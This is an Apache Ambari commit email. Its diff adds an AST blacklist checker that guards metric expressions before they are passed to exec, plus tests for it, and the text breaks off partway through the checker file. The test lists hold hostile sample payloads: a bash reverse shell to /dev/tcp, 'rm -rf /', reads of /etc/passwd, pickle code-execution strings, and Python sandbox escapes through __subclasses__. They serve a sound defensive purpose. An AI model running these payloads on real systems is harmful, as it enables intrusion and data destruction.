This is an automated email from the ASF dual-hosted git repository.

jialiang pushed a commit to branch branch-2.7
in repository https://gitbox.apache.org/repos/asf/ambari.git


The following commit(s) were added to refs/heads/branch-2.7 by this push:
     new c8cd397205 AMBARI-26202: Fix metrics issue (#3886)
c8cd397205 is described below

commit c8cd3972058f907c404166ef4252bd2e62338bea
Author: jialiang <[email protected]>
AuthorDate: Fri Nov 22 09:33:01 2024 +0800

    AMBARI-26202: Fix metrics issue (#3886)
---
 .../main/python/ambari_agent/alerts/ams_alert.py   |   8 +
 .../python/ambari_agent/alerts/metric_alert.py     |   6 +
 .../src/test/python/ambari_agent/TestASTChecker.py | 449 +++++++++++++++++++++
 .../src/main/python/ambari_commons/ast_checker.py  | 402 ++++++++++++++++++
 4 files changed, 865 insertions(+)

diff --git a/ambari-agent/src/main/python/ambari_agent/alerts/ams_alert.py b/ambari-agent/src/main/python/ambari_agent/alerts/ams_alert.py
index 4f59143189..09a77d884d 100644
--- a/ambari-agent/src/main/python/ambari_agent/alerts/ams_alert.py
+++ b/ambari-agent/src/main/python/ambari_agent/alerts/ams_alert.py
@@ -30,6 +30,7 @@ import uuid
 
 from resource_management.libraries.functions.get_port_from_url import 
get_port_from_url
 from ambari_commons import inet_utils
+from ambari_commons.ast_checker import ASTChecker,BlacklistRule
 
 logger = logging.getLogger(__name__)
 
@@ -210,9 +211,13 @@ def f(args):
     self.interval = metric_info['interval'] # in minutes
     self.app_id = metric_info['app_id']
     self.minimum_value = metric_info['minimum_value']
+    self.safeChecker = ASTChecker([BlacklistRule()], use_blacklist=True)
 
     if 'value' in metric_info:
       realcode = re.sub('(\{(\d+)\})', 'args[\g<2>][k]', metric_info['value'])
+      if not self.safeChecker.is_safe_expression(realcode):
+        logger.exception("AmsMetric: Value expression {} is not safe,blocked 
by checker".format(realcode))
+        raise Exception("AmsMetric: Value expression {} is not 
safe".format(realcode))
 
       self.custom_value_module =  imp.new_module(str(uuid.uuid4()))
       code = self.DYNAMIC_CODE_VALUE_TEMPLATE.format(realcode)
@@ -220,6 +225,9 @@ def f(args):
 
     if 'compute' in metric_info:
       realcode = metric_info['compute']
+      if not self.safeChecker.is_safe_expression(realcode):
+        logger.exception("AmsMetric: compute expression {} is not safe,blocked 
by checker".format(realcode))
+        raise Exception("AmsMetric: compute expression {} is not 
safe".format(realcode))
       self.custom_compute_module =  imp.new_module(str(uuid.uuid4()))
       code = self.DYNAMIC_CODE_COMPUTE_TEMPLATE.format(realcode)
       exec code in self.custom_compute_module.__dict__
diff --git a/ambari-agent/src/main/python/ambari_agent/alerts/metric_alert.py b/ambari-agent/src/main/python/ambari_agent/alerts/metric_alert.py
index 94da8d33bf..b5924a1f5b 100644
--- a/ambari-agent/src/main/python/ambari_agent/alerts/metric_alert.py
+++ b/ambari-agent/src/main/python/ambari_agent/alerts/metric_alert.py
@@ -32,6 +32,7 @@ from 
resource_management.libraries.functions.get_port_from_url import get_port_f
 from resource_management.libraries.functions.curl_krb_request import 
curl_krb_request
 from ambari_commons import inet_utils
 from ambari_commons.constants import AGENT_TMP_DIR
+from ambari_commons.ast_checker import ASTChecker,BlacklistRule
 
 logger = logging.getLogger(__name__)
 
@@ -287,10 +288,15 @@ def f(args):
     self.custom_module = None
     self.property_list = jmx_info['property_list']
     self.property_map = {}
+    self.safeChecker = ASTChecker([BlacklistRule()], use_blacklist=True)
 
     if 'value' in jmx_info:
       realcode = re.sub('(\{(\d+)\})', 'args[\g<2>]', jmx_info['value'])
 
+
+      if not self.safeChecker.is_safe_expression(realcode):
+        logger.exception("The expression {} is not safe,blocked by 
checker".format(realcode))
+        raise Exception("The expression {} is not safe".format(realcode))
       self.custom_module =  imp.new_module(str(uuid.uuid4()))
       code = self.DYNAMIC_CODE_TEMPLATE.format(realcode)
       exec code in self.custom_module.__dict__
diff --git a/ambari-agent/src/test/python/ambari_agent/TestASTChecker.py b/ambari-agent/src/test/python/ambari_agent/TestASTChecker.py
new file mode 100644
index 0000000000..6fd1f4f0e1
--- /dev/null
+++ b/ambari-agent/src/test/python/ambari_agent/TestASTChecker.py
@@ -0,0 +1,449 @@
+#!/usr/bin/env python2
+
+'''
+Licensed to the Apache Software Foundation (ASF) under one
+or more contributor license agreements.  See the NOTICE file
+distributed with this work for additional information
+regarding copyright ownership.  The ASF licenses this file
+to you under the Apache License, Version 2.0 (the
+"License"); you may not use this file except in compliance
+with the License.  You may obtain a copy of the License at
+
+    http://www.apache.org/licenses/LICENSE-2.0
+
+Unless required by applicable law or agreed to in writing, software
+distributed under the License is distributed on an "AS IS" BASIS,
+WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+See the License for the specific language governing permissions and
+limitations under the License.
+'''
+
+import unittest
+from ambari_commons.ast_checker import ASTChecker,BlacklistRule
+from ambari_agent.alerts.metric_alert import JmxMetric
+from ambari_agent.alerts.ams_alert import AmsMetric
+
+class TestJmxMetric(unittest.TestCase):
+  """Checks JmxMetric with value expressions that must evaluate and one that must be rejected."""
+
+  @staticmethod
+  def _jmx_info(properties, expression):
+    """Build the jmx_info dict handed to the JmxMetric constructor."""
+    return {
+      'property_list': properties,
+      'value': expression
+    }
+
+  def test_jmx_metric_calculation(self):
+    metric = JmxMetric(self._jmx_info(['a/b', 'c/d'], '({0} + {1}) / 100.0'))
+    self.assertEqual(metric.calculate([50, 50]), 1.0)
+
+  def test_jmx_metric_with_complex_calculation(self):
+    expression = 'max({0}, {2}) / min({1}, {3}) * 100.0'
+    metric = JmxMetric(self._jmx_info(['x/y', 'z/w'], expression))
+    self.assertEqual(metric.calculate([100, 50, 200, 25]), 800.0)
+
+  def test_jmx_metric_with_string_manipulation(self):
+    expression = "len({0}) + len({1})"
+    metric = JmxMetric(self._jmx_info(['str1/value', 'str2/value'], expression))
+    self.assertEqual(metric.calculate(['hello', 'world']), 10)
+
+  def test_jmx_metric_with_unsafe_operation(self):
+    # Construction itself is expected to raise for this expression.
+    jmx_info = self._jmx_info(['a/b'], "__import__('os').system('echo hacked')")
+    self.assertRaises(Exception, JmxMetric, jmx_info)
+
+
+class TestAmsMetric(unittest.TestCase):
+  """Checks AmsMetric with 'value' and 'compute' expressions that must work and ones that must be rejected."""
+
+  @staticmethod
+  def _metric_info(metric_list, **expressions):
+    """Build a metric_info dict; the 'value' / 'compute' entry is passed as a keyword."""
+    info = {
+      'metric_list': metric_list,
+      'interval': 5,
+      'app_id': 'test_app',
+      'minimum_value': 0
+    }
+    info.update(expressions)
+    return info
+
+  def _assert_value(self, metric_list, expression, samples, expected):
+    """Construct an AmsMetric from a 'value' expression and compare calculate_value(samples)."""
+    metric = AmsMetric(self._metric_info(metric_list, value=expression))
+    self.assertEqual(metric.calculate_value(samples), expected)
+
+  def _assert_value_rejected(self, expression):
+    """Expect the AmsMetric constructor to raise for the given 'value' expression."""
+    metric_info = self._metric_info(['a'], value=expression)
+    self.assertRaises(Exception, AmsMetric, metric_info)
+
+  # Safe test cases
+  def test_safe_simple_calculation(self):
+    self._assert_value(['a', 'b'],
+                       'args[0][k] + args[1][k]',
+                       [{'k': 10}, {'k': 20}],
+                       [30])
+
+  def test_safe_complex_calculation(self):
+    self._assert_value(['x', 'y', 'z'],
+                       'max(args[0][k], args[1][k]) / min(args[1][k], args[2][k]) * 100.0',
+                       [{'k': 100}, {'k': 50}, {'k': 25}],
+                       [400.0])
+
+  def test_safe_string_manipulation(self):
+    self._assert_value(['str1', 'str2'],
+                       'len(str(args[0][k])) + len(str(args[1][k]))',
+                       [{'k': 'hello'}, {'k': 'world'}],
+                       [10])
+
+  def test_safe_list_comprehension(self):
+    self._assert_value(['numbers'],
+                       'sum([x for x in args[0][k] if x > 5])',
+                       [{'k': [1, 6, 2, 7, 3, 8]}],
+                       [21])
+
+  def test_safe_dict_manipulation(self):
+    self._assert_value(['data'],
+                       'sum(args[0][k].values())',
+                       [{'k': {'a': 1, 'b': 2, 'c': 3}}],
+                       [6])
+
+  def test_safe_conditional_expression(self):
+    self._assert_value(['x', 'y'],
+                       'args[0][k] if args[0][k] > args[1][k] else args[1][k]',
+                       [{'k': 10}, {'k': 20}],
+                       [20])
+
+  def test_safe_boolean_operations(self):
+    self._assert_value(['a', 'b', 'c'],
+                       'int(args[0][k] > 0 and args[1][k] < 10 or args[2][k] == 5)',
+                       [{'k': 1}, {'k': 5}, {'k': 5}],
+                       [1])
+
+  def test_safe_compute_mean(self):
+    metric = AmsMetric(self._metric_info(['numbers'], compute='mean'))
+    result = metric.calculate_compute([1, 2, 3, 4, 5])  # Pass a flat list
+    self.assertEqual(result, 3)
+
+  def test_safe_compute_standard_deviation(self):
+    metric = AmsMetric(self._metric_info(['numbers'], compute='sample_standard_deviation'))
+    result = metric.calculate_compute([1, 2, 3, 4, 5])  # Pass a flat list
+    self.assertAlmostEqual(result, 1.4142, places=4)
+
+  def test_safe_compute_count(self):
+    metric = AmsMetric(self._metric_info(['numbers'], compute='count'))
+    result = metric.calculate_compute([1, 2, 3, 4, 5])  # Pass a flat list
+    self.assertEqual(result, 5)
+
+  # Unsafe test cases
+  def test_unsafe_import(self):
+    self._assert_value_rejected("__import__('os').system('echo hacked')")
+
+  def test_unsafe_eval(self):
+    self._assert_value_rejected("eval('2 + 2')")
+
+  def test_unsafe_exec(self):
+    self._assert_value_rejected("exec('x = 5')")
+
+  def test_unsafe_open_file(self):
+    self._assert_value_rejected("open('/etc/passwd', 'r').read()")
+
+  def test_unsafe_subprocess(self):
+    self._assert_value_rejected("__import__('subprocess').call(['ls', '-l'])")
+
+  def test_unsafe_globals(self):
+    self._assert_value_rejected("globals()['__builtins__']")
+
+  def test_unsafe_attribute_access(self):
+    self._assert_value_rejected("args.__class__.__bases__[0].__subclasses__()")
+
+  def test_unsafe_pickle(self):
+    self._assert_value_rejected("__import__('pickle').loads(b'cos\\nsystem\\n(S\"echo hacked\"\\ntR.')")
+
+  def test_unsafe_custom_function(self):
+    self._assert_value_rejected("lambda: __import__('os').system('echo hacked')")
+
+  def test_unsafe_builtin_override(self):
+    self._assert_value_rejected("__builtins__.__dict__['print'] = lambda x: exec(x)")
+
+
+class TestBlacklistASTChecker(unittest.TestCase):
+  """Runs ASTChecker in blacklist mode (with BlacklistRule) against lists of expressions."""
+
+  def setUp(self):
+    self.checker = ASTChecker([BlacklistRule()], use_blacklist=True)
+
+  def _check_expressions(self, expressions, expect_safe):
+    """
+    Assert that the checker classifies every expression as expected.
+
+    :param expressions: Iterable of code strings to feed to is_safe_expression.
+    :param expect_safe: True if each one must be accepted, False if each must be rejected.
+    """
+    label = "safe" if expect_safe else "unsafe"
+    for expr in expressions:
+      try:
+        verdict = self.checker.is_safe_expression(expr)
+        message = "Expression should be {}: {}".format(label, expr)
+        if expect_safe:
+          self.assertTrue(verdict, message)
+        else:
+          self.assertFalse(verdict, message)
+      except Exception as e:
+        # Name the offending expression (with the correct expectation) before
+        # letting the failure propagate.
+        print("Error: {}, Expression should be {}: {}".format(e, label, expr))
+        raise
+
+  def test_safe_expressions(self):
+    safe_expressions = [
+      # Original safe expressions
+      "mean",
+      "1.5",
+      "200",
+      "args[0] * 100",
+      "(args[1] - args[0])/args[1] * 100",
+      "args[0]",
+      "'[email protected]'",
+      "calculate(args[0])",
+      "args[0] + args[1]",
+      "args[0] > args[1]",
+      "args[0] and args[1]",
+      "not args[0]",
+      "-args[0]",
+      "args[0] ** 2",
+      "args[0] // 3",
+      "args[0] % 2",
+      "args[0][k]",
+      "args[1][k]",
+      "len(args[0])",
+      "max(args[0][k], args[1][k])",
+      "min(args[0][k], 10)",
+      "args[0][k] + args[1][k]",
+      "(args[1][k] - args[0][k]) / args[0][k] * 100 if args[0][k] != 0 else 0",
+      "args[0][k] if args[0][k] > args[1][k] else args[1][k]",
+      "(args[0][k] + args[1][k] + args[2][k]) / 3",
+      "len(str(args[0][k]))",
+      "int(args[0][k]) if args[0][k] is not None else 0",
+      "args[0][k] * 2 if args[1][k] > 100 else args[0][k] / 2 if args[1][k] < 50 else args[0][k]",
+
+      # Safe expressions from test_expressions
+      "max(args[0], args[1])",
+      "len([1, 2, 3])",
+      "print('Hello, world!')",
+      "x = [i for i in range(10)]",
+      "def custom_function(x): return x * 2",
+      "class CustomClass: pass",
+      "try: 1/0\nexcept ZeroDivisionError: pass",
+      "safe_function([1, 2, 3])",
+
+      # Safe expressions from ams
+      "args[0][k]",
+      "args[1][k]",
+      "len(args[0])",
+      "max(args[0][k], args[1][k])",
+      "min(args[0][k], 10)",
+      "args[0][k] + args[1][k]",
+      "(args[1][k] - args[0][k]) / args[0][k] * 100 if args[0][k] != 0 else 0",
+      "args[0][k] if args[0][k] > args[1][k] else args[1][k]",
+      "(args[0][k] + args[1][k] + args[2][k]) / 3",
+      "len(str(args[0][k]))",
+      "int(args[0][k]) if args[0][k] is not None else 0",
+      "args[0][k] * 2 if args[1][k] > 100 else args[0][k] / 2 if args[1][k] < 50 else args[0][k]",
+      "sample_standard_deviation_percentage(args)",
+      "sample_standard_deviation(args)",
+      "mean(args)",
+      "count(args)",
+    ]
+
+    self._check_expressions(safe_expressions, True)
+
+  def test_unsafe_expressions(self):
+    unsafe_expressions = [
+      # Original unsafe expressions
+      "__import__('os').system('bash -i >& /dev/tcp/127.0.0.1/18888 0>&1')",
+      "open('/etc/passwd').read()",
+      "exec('malicious code')",
+      "exec('x = 5')",
+      "eval('dangerous_function()')",
+      "globals()['__builtins__']['__import__']('os').system('rm -rf /')",
+      "getattr(__import__('os'), 'system')('echo hacked')",
+      "(lambda: __import__('subprocess').call('ls'))()",
+      "__class__.__base__.__subclasses__()[40]('/etc/passwd').read()",
+      "import os; os.system('whoami')",
+      "().__class__.__bases__[0].__subclasses__()[59].__init__.__globals__['sys'].modules['os'].system('ls')",
+      "args[0].__class__.__bases__[0].__subclasses__()",
+      "args[0].__dict__",
+      "args[0].__globals__",
+
+      # Unsafe expressions from test_expressions
+      "with open('file.txt', 'r') as f: content = f.read()",
+      "eval('1 + 1')",
+      "os.system('echo hello')",
+      "__import__('os').system('echo hello')",
+      "obj._private_method()",
+      "obj.__dict__",
+      "_hidden_function()",
+      "from module import _private_func",
+      "import _private_module",
+
+      # Additional unsafe expressions
+      "import subprocess; subprocess.Popen('ls', shell=True)",
+      "import pickle; pickle.loads(b'cos\\nsystem\\n(S\'echo hacked\'\\ntR.\')",
+      "__import__('os').popen('ls').read()",
+      "import importlib; importlib.import_module('os').system('echo hacked')",
+      "exec(\"__import__('os').system('echo hacked')\")",
+      "(lambda f: f(f))(lambda f: __import__('os').system('echo hacked') or f(f))",
+      "__builtins__.__dict__['__import__']('os').system('echo hacked')",
+      "globals().get('__builtins__').get('__import__')('os').system('echo hacked')",
+      "[c for c in ().__class__.__base__.__subclasses__() if c.__name__ == 'catch_warnings'][0]()._module.__builtins__['__import__']('os').system('echo hacked')",
+      "next(c for c in {}.__class__.__bases__[0].__subclasses__() if c.__name__ == 'Popen')(['echo', 'hacked'])",
+      "type(''.join, (object,), {'__getitem__': lambda self, _: __import__('os').system('echo hacked')})()['']",
+      "().__class__.__bases__[0].__subclasses__()[59].__init__.__globals__['linecache'].__dict__['os'].system('echo hacked')",
+      "getattr(getattr(getattr(getattr(getattr(getattr(getattr(getattr(getattr(getattr(getattr(getattr(getattr(getattr(getattr(__import__('os'), 'path'), 'abspath'), '__globals__'), '__builtins__'), '__import__'), '__globals__'), '__builtins__'), '__import__'), '__globals__'), '__builtins__'), '__import__'), '__globals__'), '__builtins__'), '__import__')('os').system('echo hacked')",
+      "(__builtins__.__dict__['__import__']('functools').reduce(lambda f, n: getattr(f, n), ['__globals__', '__builtins__', '__import__'], __import__('os')))('os').system('echo hacked')",
+      "type(''.join, (object,), {'__getitem__': lambda self, _: __import__('os').system('echo hacked')})()['']",
+      "(lambda fc=(lambda n: [c for c in ().__class__.__bases__[0].__subclasses__() if c.__name__ == n][0]): fc('Popen')(['echo', 'hacked']))()",
+      "(lambda x: ().__class__.__bases__[0].__subclasses__()[59].__init__.__globals__[x])('sys').modules['os'].system('echo hacked')",
+      "getattr(__import__('ctypes'), 'windll', __import__('ctypes').cdll).LoadLibrary('libc.so.6').system('echo hacked')",
+      "type(''.join, (object,), {'__getitem__': lambda self, _: __import__('os').system('echo hacked')})()['']",
+      "next(filter(lambda x: x.__name__ == 'Popen', ().__class__.__bases__[0].__subclasses__()))(['echo', 'hacked'])",
+      "(lambda fc=(lambda n: [c for c in ().__class__.__bases__[0].__subclasses__() if c.__name__ == n][0]): fc('Popen')(['echo', 'hacked']))()",
+      "(lambda x: ().__class__.__bases__[0].__subclasses__()[59].__init__.__globals__[x])('sys').modules['os'].system('echo hacked')",
+      "getattr(__import__('ctypes'), 'windll', __import__('ctypes').cdll).LoadLibrary('libc.so.6').system('echo hacked')",
+      "(__import__('codecs').decode('X19pbXBvcnRfXygnb3MnKS5zeXN0ZW0oJ2VjaG8gaGFja2VkJyk=', 'base64'))",
+      "compile('__import__(\\'os\\').system(\\'echo hacked\\')', '<string>', 'exec')",
+      "locals()['__builtins__']['__import__']('os').system('echo hacked')",
+      "vars(__builtins__)['__import__']('os').system('echo hacked')",
+      "(lambda x: x.__class__.__bases__[0].__subclasses__()[59].__init__.__globals__.values())(0)[13]['eval']('__import__(\\'os\\').system(\\'echo hacked\\')')",
+      "(lambda x: x.__class__.__bases__[0].__subclasses__()[59].__init__.__globals__.values())(0)[13]['__import__']('os').system('echo hacked')",
+
+      "import os",
+      "open('file.txt', 'w')",
+      "eval('1 + 1')",
+      "exec('print(\"Hello\")')",
+      "__import__('os').system('ls')",
+      "globals()['__builtins__']['eval']('1+1')",
+      "args[0].__class__.__bases__[0].__subclasses__()",
+    ]
+
+    self._check_expressions(unsafe_expressions, False)
+
+  def test_syntax_error(self):
+    # Unbalanced brace: the checker is expected to report this as not safe.
+    expr = "(args[1] - args[0])/{args[1] * 100"
+    self.assertFalse(self.checker.is_safe_expression(expr), "Expression with syntax error should be unsafe: {}".format(expr))
+
diff --git a/ambari-common/src/main/python/ambari_commons/ast_checker.py b/ambari-common/src/main/python/ambari_commons/ast_checker.py
new file mode 100644
index 0000000000..9839b3b09f
--- /dev/null
+++ b/ambari-common/src/main/python/ambari_commons/ast_checker.py
@@ -0,0 +1,402 @@
+# -*- coding: utf-8 -*-
+#!/usr/bin/env python2
+'''
+Licensed to the Apache Software Foundation (ASF) under one
+or more contributor license agreements.  See the NOTICE file
+distributed with this work for additional information
+regarding copyright ownership.  The ASF licenses this file
+to you under the Apache License, Version 2.0 (the
+"License"); you may not use this file except in compliance
+with the License.  You may obtain a copy of the License at
+
+    http://www.apache.org/licenses/LICENSE-2.0
+
+Unless required by applicable law or agreed to in writing, software
+distributed under the License is distributed on an "AS IS" BASIS,
+WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+See the License for the specific language governing permissions and
+limitations under the License.
+'''
+
+import ast
+from abc import ABCMeta, abstractmethod
+
+import logging
+logger = logging.getLogger(__name__)
+"""
+This module provides a framework for checking the safety of Python code expressions.
+It includes abstract base classes for defining rule templates, concrete rule implementations,
+and an AST checker that applies these rules to validate code safety.
+"""
+
+class RuleTemplate(object):
+    """
+    Abstract interface describing one safety rule.
+
+    A concrete rule supplies four things: the variable names it permits, the
+    function names it permits, the AST node types it permits, and a mapping of
+    extra check functions keyed by AST node type.
+    """
+    # Python 2 way of selecting the metaclass; ABCMeta is what gives the
+    # @abstractmethod markers below their meaning.
+    __metaclass__ = ABCMeta
+
+    @abstractmethod
+    def allowed_names(self):
+        """Return the set of variable names this rule permits."""
+
+    @abstractmethod
+    def allowed_functions(self):
+        """Return the set of function names this rule permits."""
+
+    @abstractmethod
+    def allowed_node_types(self):
+        """Return the set of AST node types this rule permits."""
+
+    @abstractmethod
+    def custom_checks(self):
+        """Return a dict mapping AST node types to check functions for those nodes."""
+
+
+class DefaultRule(RuleTemplate):
+    """
+    Baseline RuleTemplate implementation: a small fixed set of allowed names,
+    functions and AST node types, and no custom checks.
+    """
+
+    # Node classes are listed by name and resolved against the ast module when
+    # requested, because the available classes differ between interpreter
+    # versions. For example the Python 2.7 ast module has no ast.Constant, so
+    # referencing it directly raises AttributeError there.
+    _NODE_TYPE_NAMES = (
+        'Num', 'Str', 'Constant',
+        'Name', 'Call', 'BinOp', 'UnaryOp',
+        'Compare', 'BoolOp', 'Subscript', 'Index',
+        'Load', 'Expression',
+        'Add', 'Sub', 'Mult', 'Div', 'FloorDiv', 'Mod', 'Pow',
+        'UAdd', 'USub',
+        'Eq', 'NotEq', 'Lt', 'LtE', 'Gt', 'GtE',
+        'And', 'Or', 'Not',
+        'Lambda', 'IfExp', 'If', 'Return', 'Continue',
+    )
+
+    def allowed_names(self):
+        """Allow only 'args' as a variable name."""
+        return {'args'}
+
+    def allowed_functions(self):
+        """Allow a limited set of function names."""
+        return {'calculate', 'max', 'min', 'len'}
+
+    def allowed_node_types(self):
+        """
+        Return the allowed AST node classes.
+
+        Names in _NODE_TYPE_NAMES that the running interpreter's ast module
+        does not define are left out instead of raising AttributeError.
+        """
+        resolved = (getattr(ast, name, None) for name in self._NODE_TYPE_NAMES)
+        return set(node_type for node_type in resolved if node_type is not None)
+
+    def custom_checks(self):
+        """No custom checks for the default rule."""
+        return {}
+
+
+class ASTChecker:
+    """
+    Checks the safety of Python code by analyzing its Abstract Syntax Tree (AST).
+
+    In blacklist mode every node is passed through the custom checks of every
+    rule. In whitelist mode every node must be of an allowed node type, names
+    and called functions must come from the rules' allowed sets, and the
+    combined custom checks must pass.
+    """
+
+    def __init__(self, rules, use_blacklist = False):
+        """
+        Initialize the ASTChecker with a list of rules and a flag to use blacklist mode.
+
+        :param rules: List of rule objects. Blacklist mode only calls their
+                      custom_checks(); whitelist mode also calls allowed_names(),
+                      allowed_functions() and allowed_node_types().
+        :param use_blacklist: If True, use blacklist mode; otherwise, use whitelist mode.
+        """
+        self.rules = rules
+        self.use_blacklist = use_blacklist
+        if not use_blacklist:
+            # The combined allow-sets are only needed (and only built) in whitelist mode.
+            self._compile_rules()
+
+    def _compile_rules(self):
+        """Merge the allow-sets and custom checks of all rules into attributes of the checker."""
+        self.allowed_names = set().union(*(rule.allowed_names() for rule in self.rules))
+        self.allowed_functions = set().union(*(rule.allowed_functions() for rule in self.rules))
+        self.allowed_node_types = set().union(*(rule.allowed_node_types() for rule in self.rules))
+
+        # Combine custom checks from all rules. When two rules register a check
+        # for the same node type, both must pass.
+        self.custom_checks = {}
+        for rule in self.rules:
+            for node_type, check_func in rule.custom_checks().items():
+                if node_type in self.custom_checks:
+                    original_func = self.custom_checks[node_type]
+                    # Default arguments bind the current pair of functions.
+                    self.custom_checks[node_type] = lambda node, of=original_func, nf=check_func: of(node) and nf(node)
+                else:
+                    self.custom_checks[node_type] = check_func
+
+    def is_safe_expression(self, code):
+        """
+        Check if the given code string is safe according to the configured rules.
+
+        The string is parsed as an expression first and, if that fails, as
+        statements. Code that parses in neither mode is reported as unsafe.
+
+        :param code: The code string to check.
+        :return: True if the code is safe, False otherwise.
+        """
+        try:
+            # First, try to parse as an expression
+            tree = ast.parse(code, mode='eval')
+        except SyntaxError:
+            try:
+                # If that fails, try to parse as a statement
+                tree = ast.parse(code, mode='exec')
+            except SyntaxError:
+                logger.info("Syntax error in expression: {}".format(code))
+                return False
+
+        return self.is_safe_node(tree)
+
+    def is_safe_node(self, node):
+        """
+        Recursively check if an AST node and all its children are safe.
+
+        Dispatches on the mode chosen at construction time, so whitelist mode
+        actually enforces the allowed names, functions and node types.
+
+        :param node: The AST node to check.
+        :return: True if the node and all its children are safe, False otherwise.
+        """
+        if not self.use_blacklist:
+            return self._is_safe_node_whitelist(node)
+
+        if not self._is_safe_node_blacklist(node):
+            return False
+
+        # Recursively check all child nodes
+        for child in ast.iter_child_nodes(node):
+            if not self.is_safe_node(child):
+                return False
+
+        return True
+
+    def _is_safe_node_blacklist(self, node):
+        """
+        Check a single node (not its children) against the custom checks of every rule.
+
+        :param node: The AST node to check.
+        :return: True if no applicable check rejects the node, False otherwise.
+        """
+        for rule in self.rules:
+            for node_type, check_func in rule.custom_checks().items():
+                if isinstance(node, node_type) and not check_func(node):
+                    return False
+        return True
+
+    def _is_safe_node_whitelist(self, node):
+        """
+        Check a node and, recursively, its children against the whitelist.
+
+        :param node: The AST node to check.
+        :return: True if the node and all its children are allowed, False otherwise.
+        """
+        if not isinstance(node, tuple(self.allowed_node_types)):
+            logger.info("Node type not allowed: {}".format(type(node).__name__))
+            return False
+
+        if isinstance(node, ast.Name):
+            if node.id not in self.allowed_names and node.id not in self.allowed_functions:
+                logger.info("Name not allowed: {}".format(node.id))
+                return False
+        elif isinstance(node, ast.Call):
+            # Only direct calls to an allowed function name are accepted.
+            if not isinstance(node.func, ast.Name) or node.func.id not in self.allowed_functions:
+                logger.info("Function call not allowed: {}".format(ast.dump(node.func)))
+                return False
+
+        node_type = type(node)
+        if node_type in self.custom_checks:
+            if not self.custom_checks[node_type](node):
+                logger.info("Custom check failed for node: {}".format(ast.dump(node)))
+                return False
+
+        # Recursively check child nodes
+        for child in ast.iter_child_nodes(node):
+            if not self._is_safe_node_whitelist(child):
+                return False
+
+        return True
+
+    def print_ast_tree(self, code):
+        """
+        Print the AST tree of the given code string.
+
+        The heading and any syntax error go to the module logger; the tree
+        itself is printed to standard output.
+
+        :param code: The code string to visualize.
+        """
+        try:
+            tree = ast.parse(code, mode='exec')
+            logger.info("AST Tree:")
+            self._print_node(tree, "", True)
+        except SyntaxError:
+            logger.info("Syntax error in expression: {}".format(code))
+
+    def _print_node(self, node, prefix, is_last):
+        """
+        Recursively print an AST node and its children.
+
+        :param node: The AST node to print.
+        :param prefix: The prefix string for the current line.
+        :param is_last: Whether this is the last child of its parent.
+        """
+        # Single-argument print(...) behaves the same as the print statement here.
+        print(prefix + ("└── " if is_last else "├── ") + type(node).__name__)
+
+        # Prepare the prefix for child nodes
+        child_prefix = prefix + ("    " if is_last else "│   ")
+
+        # Get all fields of the node
+        fields = list(ast.iter_fields(node))
+
+        # Print fields and child nodes
+        for i, (name, value) in enumerate(fields):
+            is_last_field = i == len(fields) - 1
+
+            if isinstance(value, ast.AST):
+                self._print_node(value, child_prefix, is_last_field)
+            elif isinstance(value, list) and value and isinstance(value[0], ast.AST):
+                print(child_prefix + ("└── " if is_last_field else "├── ") + name + ":")
+                for j, item in enumerate(value):
+                    self._print_node(item, child_prefix + "    ", j == len(value) - 1)
+            else:
+                print(child_prefix + ("└── " if is_last_field else "├── ") + "{}: {}".format(name,value))
+
+
+class BlacklistRule:
+    """
+    A rule that defines a blacklist of dangerous functions, modules, and
+    constructs.
+
+    ``custom_checks`` exposes one predicate per AST node type. Every predicate
+    returns True when the node is acceptable and False when it must be blocked.
+    Names and attributes whose last component starts with an underscore are
+    rejected as well, which covers dunder access such as ``x.__class__``.
+    """
+
+    def __init__(self):
+        """Initialize the blacklist of dangerous items and modules."""
+        self.blacklist = {
+            'eval', 'exec', 'compile', '__import__', 'open', 'file',
+            'os.system', 'subprocess.call', 'subprocess.Popen',
+            'pickle.loads', 'pickle.load', 'marshal.loads',
+            'builtins', '__builtins__', 'globals', 'locals', 'getattr',
+            'setattr', 'delattr', 'hasattr', 'importlib', 'importlib.import_module',
+            'os', 'subprocess', 'sys', 'shutil', 'pty'
+        }
+        self.dangerous_modules = {'os', 'subprocess', 'sys', 'importlib', 'pickle', 'marshal'}
+
+    def custom_checks(self):
+        """Return a dictionary of custom check functions keyed by AST node type."""
+        checks = {
+            ast.Name: self._check_name,
+            ast.Call: self._check_call,
+            ast.Attribute: self._check_attribute,
+            ast.Import: self._check_import,
+            ast.ImportFrom: self._check_importfrom,
+            ast.Subscript: self._check_subscript,
+            ast.Module: self._check_module,
+        }
+        # ast.Exec only exists in the Python 2 grammar; guard the lookup so the
+        # rule can still be built on interpreters that do not define it.
+        exec_node_type = getattr(ast, 'Exec', None)
+        if exec_node_type is not None:
+            checks[exec_node_type] = self._check_exec
+        return checks
+
+    def _check_exec(self, node):
+        """Reject every exec statement unconditionally."""
+        return False
+
+    def _check_name(self, node):
+        """Check that a Name node is not blacklisted and has no leading underscore."""
+        if isinstance(node, ast.Name):
+            return node.id not in self.blacklist and not node.id.startswith('_')
+        return True
+
+    def _check_call(self, node):
+        """Check if a function call is safe, based on the callee expression."""
+        if isinstance(node.func, ast.Name):
+            return node.func.id not in self.blacklist and not node.func.id.startswith('_')
+        elif isinstance(node.func, ast.Attribute):
+            return self._check_attribute(node.func)
+        return True
+
+    def _check_attribute(self, node):
+        """Check if an attribute access is safe."""
+        full_name = self._get_attribute_name(node)
+        return full_name not in self.blacklist and not full_name.split('.')[-1].startswith('_')
+
+    def _is_dangerous_module(self, module_name):
+        """
+        Return True when a dotted module path must be blocked.
+
+        The top-level package is checked in addition to the full path so that
+        submodules of a dangerous module (for example ``os.path``) are blocked.
+        An empty or missing name (relative ``from . import x``) is not blocked.
+        """
+        if not module_name:
+            return False
+        top_level = module_name.split('.')[0]
+        return (module_name in self.dangerous_modules
+                or top_level in self.dangerous_modules
+                or module_name.startswith('_'))
+
+    def _check_import(self, node):
+        """Check if an import statement is safe."""
+        return all(not self._is_dangerous_module(alias.name) for alias in node.names)
+
+    def _check_importfrom(self, node):
+        """Check if an import from statement is safe."""
+        if self._is_dangerous_module(node.module):
+            return False
+        return all(alias.name not in self.blacklist and not alias.name.startswith('_')
+                   for alias in node.names)
+
+    def _check_subscript(self, node):
+        """Check if a subscript operation is safe, based on the subscripted value."""
+        if isinstance(node.value, ast.Name):
+            return node.value.id not in self.blacklist
+        elif isinstance(node.value, ast.Attribute):
+            return self._check_attribute(node.value)
+        return True
+
+    def _check_module(self, node):
+        """
+        Check if a module is safe by examining its top-level statements.
+
